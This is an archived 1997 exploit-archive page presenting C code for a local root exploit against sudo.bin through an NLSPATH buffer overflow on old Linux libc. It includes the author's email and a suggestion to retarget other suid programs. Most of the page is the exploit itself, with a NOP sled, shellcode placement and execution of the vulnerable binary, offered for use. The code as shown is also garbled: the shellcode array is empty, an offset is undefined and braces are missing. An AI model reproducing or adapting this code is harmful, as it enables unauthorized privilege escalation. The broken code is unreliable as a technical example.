sudo.bin exploit for NLSPATH vulnerability

Description:Another NLSPATH exploit, this time for sudo.bin
Author:_Phantom_ <>
Compromise: root (local)
Vulnerable Systems:Linux with libc around or before 5.3.12, 5.4.7, and sudo.bin installed (Slackware 3.1 and 3.0 maybe?)
Date:13 February 1996 was when we started seeing this class of exploits
Notes:I wish more people would email me exploits like _Phantom_ did! He has also sent in a bunch of other NLSPATH sploits. If the system doesn't have this particular binary, pick another suid program and just change the execl

Date: Wed, 30 Apr 1997 13:46:39 +0200 (GMT+0200)
From: _Phantom_ <>
To: Fyodor <>
Subject: Re: New sudo exploit

Here 'tiz, the abominable SUDO exploit...
EDUCATIONAL purposes only.... :-)

    See ya.

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PATH_SUDO "/usr/bin/sudo.bin"
#define BUFFER_SIZE 1024

u_long get_esp()
  __asm__("movl %esp, %eax");


main(int argc, char **argv)
  u_char execshell[] =

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
      printf("can't allocate memory\n");
   ptr = buff;

   /* fill start of buffer with nops */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer */

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   printf("SUDO.BIN exploit coded by _PHANTOM_ 1997\n");
   execl(PATH_SUDO, "sudo.bin","bash", NULL);

Sorry Sir, I didn't know you were ROOT !!?!?!!!	 

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: